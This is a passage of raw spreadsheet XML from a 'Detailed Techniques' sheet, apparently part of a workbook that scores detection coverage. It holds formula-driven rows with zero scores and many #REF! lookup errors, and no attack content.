        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F83&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F83))-LEN(SUBSTITUTE(TRIM(F83),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O83" s="18" t="e">
        <f t="shared" si="10"/>
        <v>#REF!</v>
      </c>
      <c r="P83" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F83&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F83))-LEN(SUBSTITUTE(TRIM(F83),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q83" s="18" t="e">
        <f t="shared" si="11"/>
        <v>#REF!</v>
      </c>
      <c r="R83" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F83&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F83))-LEN(SUBSTITUTE(TRIM(F83),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S83" s="18" t="e">
        <f t="shared" si="12"/>
        <v>#REF!</v>
      </c>
      <c r="T83" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F83&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F83))-LEN(SUBSTITUTE(TRIM(F83),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U83" s="18" t="e">
        <f t="shared" si="13"/>
        <v>#REF!</v>
      </c>
      <c r="V83" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F83&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F83))-LEN(SUBSTITUTE(TRIM(F83),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W83" s="18" t="e">
        <f t="shared" si="14"/>
        <v>#REF!</v>
      </c>
      <c r="X83" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F83&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F83))-LEN(SUBSTITUTE(TRIM(F83),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y83" s="18" t="e">
        <f t="shared" si="15"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="84" spans="1:25" ht="185.25" x14ac:dyDescent="0.45">
      <c r="A84" s="8" t="s">
        <v>33</v>
      </c>
      <c r="B84" s="8" t="s">
        <v>4</v>
      </c>
      <c r="C84" s="8" t="s">
        <v>614</v>
      </c>
      <c r="D84" s="10" t="s">
        <v>615</v>
      </c>
      <c r="E84" s="10" t="s">
        <v>424</v>
      </c>
      <c r="F84" s="10" t="s">
        <v>616</v>
      </c>
      <c r="G84" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K84,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H84" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F84&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F84))-LEN(SUBSTITUTE(TRIM(F84),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I84" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F84&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F84))-LEN(SUBSTITUTE(TRIM(F84),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J84" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F84&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F84))-LEN(SUBSTITUTE(TRIM(F84),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K84" s="51">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="L84" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F84&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F84))-LEN(SUBSTITUTE(TRIM(F84),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M84" s="18" t="str">
        <f t="shared" si="9"/>
        <v>0-20</v>
      </c>
      <c r="N84" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F84&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F84))-LEN(SUBSTITUTE(TRIM(F84),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O84" s="18" t="e">
        <f t="shared" si="10"/>
        <v>#REF!</v>
      </c>
      <c r="P84" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F84&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F84))-LEN(SUBSTITUTE(TRIM(F84),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q84" s="18" t="e">
        <f t="shared" si="11"/>
        <v>#REF!</v>
      </c>
      <c r="R84" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F84&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F84))-LEN(SUBSTITUTE(TRIM(F84),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S84" s="18" t="e">
        <f t="shared" si="12"/>
        <v>#REF!</v>
      </c>
      <c r="T84" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F84&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F84))-LEN(SUBSTITUTE(TRIM(F84),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U84" s="18" t="e">
        <f t="shared" si="13"/>
        <v>#REF!</v>
      </c>
      <c r="V84" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F84&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F84))-LEN(SUBSTITUTE(TRIM(F84),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W84" s="18" t="e">
        <f t="shared" si="14"/>
        <v>#REF!</v>
      </c>
      <c r="X84" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F84&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F84))-LEN(SUBSTITUTE(TRIM(F84),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y84" s="18" t="e">
        <f t="shared" si="15"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="85" spans="1:25" ht="114" x14ac:dyDescent="0.45">
      <c r="A85" s="8" t="s">
        <v>216</v>
      </c>
      <c r="B85" s="8" t="s">
        <v>0</v>
      </c>
      <c r="C85" s="8" t="s">
        <v>617</v>
      </c>
      <c r="D85" s="10" t="s">
        <v>618</v>
      </c>
      <c r="E85" s="10" t="s">
        <v>619</v>
      </c>
      <c r="F85" s="10" t="s">
        <v>620</v>
      </c>
      <c r="G85" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K85,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H85" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F85&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F85))-LEN(SUBSTITUTE(TRIM(F85),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I85" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F85&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F85))-LEN(SUBSTITUTE(TRIM(F85),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J85" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F85&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F85))-LEN(SUBSTITUTE(TRIM(F85),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K85" s="51">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="L85" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F85&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F85))-LEN(SUBSTITUTE(TRIM(F85),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M85" s="18" t="str">
        <f t="shared" si="9"/>
        <v>0-20</v>
      </c>
      <c r="N85" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F85&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F85))-LEN(SUBSTITUTE(TRIM(F85),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O85" s="18" t="e">
        <f t="shared" si="10"/>
        <v>#REF!</v>
      </c>
      <c r="P85" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F85&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F85))-LEN(SUBSTITUTE(TRIM(F85),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q85" s="18" t="e">
        <f t="shared" si="11"/>
        <v>#REF!</v>
      </c>
      <c r="R85" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F85&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F85))-LEN(SUBSTITUTE(TRIM(F85),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S85" s="18" t="e">
        <f t="shared" si="12"/>
        <v>#REF!</v>
      </c>
      <c r="T85" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F85&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F85))-LEN(SUBSTITUTE(TRIM(F85),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U85" s="18" t="e">
        <f t="shared" si="13"/>
        <v>#REF!</v>
      </c>
      <c r="V85" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F85&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F85))-LEN(SUBSTITUTE(TRIM(F85),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W85" s="18" t="e">
        <f t="shared" si="14"/>
        <v>#REF!</v>
      </c>
      <c r="X85" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F85&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F85))-LEN(SUBSTITUTE(TRIM(F85),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y85" s="18" t="e">
        <f t="shared" si="15"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="86" spans="1:25" ht="114" x14ac:dyDescent="0.45">
      <c r="A86" s="8" t="s">
        <v>124</v>
      </c>
      <c r="B86" s="8" t="s">
        <v>541</v>
      </c>
      <c r="C86" s="8" t="s">
        <v>621</v>
      </c>
      <c r="D86" s="10" t="s">
        <v>622</v>
      </c>
      <c r="E86" s="10" t="s">
        <v>623</v>
      </c>
      <c r="F86" s="10" t="s">
        <v>624</v>
      </c>
      <c r="G86" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K86,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H86" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F86&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F86))-LEN(SUBSTITUTE(TRIM(F86),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I86" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F86&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F86))-LEN(SUBSTITUTE(TRIM(F86),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J86" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F86&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F86))-LEN(SUBSTITUTE(TRIM(F86),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K86" s="51">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="L86" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F86&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F86))-LEN(SUBSTITUTE(TRIM(F86),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M86" s="18" t="str">
        <f t="shared" si="9"/>
        <v>0-20</v>
      </c>
      <c r="N86" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F86&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F86))-LEN(SUBSTITUTE(TRIM(F86),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O86" s="18" t="e">
        <f t="shared" si="10"/>
        <v>#REF!</v>
      </c>
      <c r="P86" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F86&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F86))-LEN(SUBSTITUTE(TRIM(F86),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q86" s="18" t="e">
        <f t="shared" si="11"/>
        <v>#REF!</v>
      </c>
      <c r="R86" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F86&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F86))-LEN(SUBSTITUTE(TRIM(F86),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S86" s="18" t="e">
        <f t="shared" si="12"/>
        <v>#REF!</v>
      </c>
      <c r="T86" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F86&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F86))-LEN(SUBSTITUTE(TRIM(F86),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U86" s="18" t="e">
        <f t="shared" si="13"/>
        <v>#REF!</v>
      </c>
      <c r="V86" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F86&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F86))-LEN(SUBSTITUTE(TRIM(F86),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W86" s="18" t="e">
        <f t="shared" si="14"/>
        <v>#REF!</v>
      </c>
      <c r="X86" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F86&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F86))-LEN(SUBSTITUTE(TRIM(F86),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y86" s="18" t="e">
        <f t="shared" si="15"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="87" spans="1:25" ht="242.25" x14ac:dyDescent="0.45">
      <c r="A87" s="8" t="s">
        <v>94</v>
      </c>
      <c r="B87" s="8" t="s">
        <v>6</v>
      </c>
      <c r="C87" s="8" t="s">
        <v>625</v>
      </c>
      <c r="D87" s="10" t="s">
        <v>626</v>
      </c>
      <c r="E87" s="10" t="s">
        <v>627</v>
      </c>
      <c r="F87" s="10" t="s">
        <v>628</v>
      </c>
      <c r="G87" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K87,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H87" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F87&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F87))-LEN(SUBSTITUTE(TRIM(F87),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I87" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F87&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F87))-LEN(SUBSTITUTE(TRIM(F87),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J87" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F87&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F87))-LEN(SUBSTITUTE(TRIM(F87),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K87" s="51">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="L87" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F87&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F87))-LEN(SUBSTITUTE(TRIM(F87),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M87" s="18" t="str">
        <f t="shared" si="9"/>
        <v>0-20</v>
      </c>
      <c r="N87" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F87&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F87))-LEN(SUBSTITUTE(TRIM(F87),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O87" s="18" t="e">
        <f t="shared" si="10"/>
        <v>#REF!</v>
      </c>
      <c r="P87" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F87&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F87))-LEN(SUBSTITUTE(TRIM(F87),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q87" s="18" t="e">
        <f t="shared" si="11"/>
        <v>#REF!</v>
      </c>
      <c r="R87" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F87&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F87))-LEN(SUBSTITUTE(TRIM(F87),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S87" s="18" t="e">
        <f t="shared" si="12"/>
        <v>#REF!</v>
      </c>
      <c r="T87" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F87&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F87))-LEN(SUBSTITUTE(TRIM(F87),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U87" s="18" t="e">
        <f t="shared" si="13"/>
        <v>#REF!</v>
      </c>
      <c r="V87" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F87&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F87))-LEN(SUBSTITUTE(TRIM(F87),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W87" s="18" t="e">
        <f t="shared" si="14"/>
        <v>#REF!</v>
      </c>
      <c r="X87" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F87&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F87))-LEN(SUBSTITUTE(TRIM(F87),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y87" s="18" t="e">
        <f t="shared" si="15"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="88" spans="1:25" ht="199.5" x14ac:dyDescent="0.45">
      <c r="A88" s="8" t="s">
        <v>14</v>
      </c>
      <c r="B88" s="8" t="s">
        <v>4</v>
      </c>
      <c r="C88" s="8" t="s">
        <v>629</v>
      </c>
      <c r="D88" s="10" t="s">
        <v>630</v>
      </c>
      <c r="E88" s="10" t="s">
        <v>631</v>
      </c>
      <c r="F88" s="10" t="s">
        <v>632</v>
      </c>
      <c r="G88" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K88,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H88" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F88&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F88))-LEN(SUBSTITUTE(TRIM(F88),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I88" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F88&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F88))-LEN(SUBSTITUTE(TRIM(F88),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J88" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F88&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F88))-LEN(SUBSTITUTE(TRIM(F88),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K88" s="51">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="L88" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F88&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F88))-LEN(SUBSTITUTE(TRIM(F88),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M88" s="18" t="str">
        <f t="shared" si="9"/>
        <v>0-20</v>
      </c>
      <c r="N88" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F88&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F88))-LEN(SUBSTITUTE(TRIM(F88),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O88" s="18" t="e">
        <f t="shared" si="10"/>
        <v>#REF!</v>
      </c>
      <c r="P88" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F88&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F88))-LEN(SUBSTITUTE(TRIM(F88),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q88" s="18" t="e">
        <f t="shared" si="11"/>
        <v>#REF!</v>
      </c>
      <c r="R88" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F88&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F88))-LEN(SUBSTITUTE(TRIM(F88),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S88" s="18" t="e">
        <f t="shared" si="12"/>
        <v>#REF!</v>
      </c>
      <c r="T88" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F88&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F88))-LEN(SUBSTITUTE(TRIM(F88),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U88" s="18" t="e">
        <f t="shared" si="13"/>
        <v>#REF!</v>
      </c>
      <c r="V88" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F88&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F88))-LEN(SUBSTITUTE(TRIM(F88),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W88" s="18" t="e">
        <f t="shared" si="14"/>
        <v>#REF!</v>
      </c>
      <c r="X88" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F88&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F88))-LEN(SUBSTITUTE(TRIM(F88),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y88" s="18" t="e">
        <f t="shared" si="15"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="89" spans="1:25" ht="156.75" x14ac:dyDescent="0.45">
      <c r="A89" s="8" t="s">
        <v>31</v>
      </c>
      <c r="B89" s="8" t="s">
        <v>506</v>
      </c>
      <c r="C89" s="8" t="s">
        <v>633</v>
      </c>
      <c r="D89" s="10" t="s">
        <v>634</v>
      </c>
      <c r="E89" s="10" t="s">
        <v>635</v>
      </c>
      <c r="F89" s="10" t="s">
        <v>636</v>
      </c>
      <c r="G89" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K89,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H89" s="51">
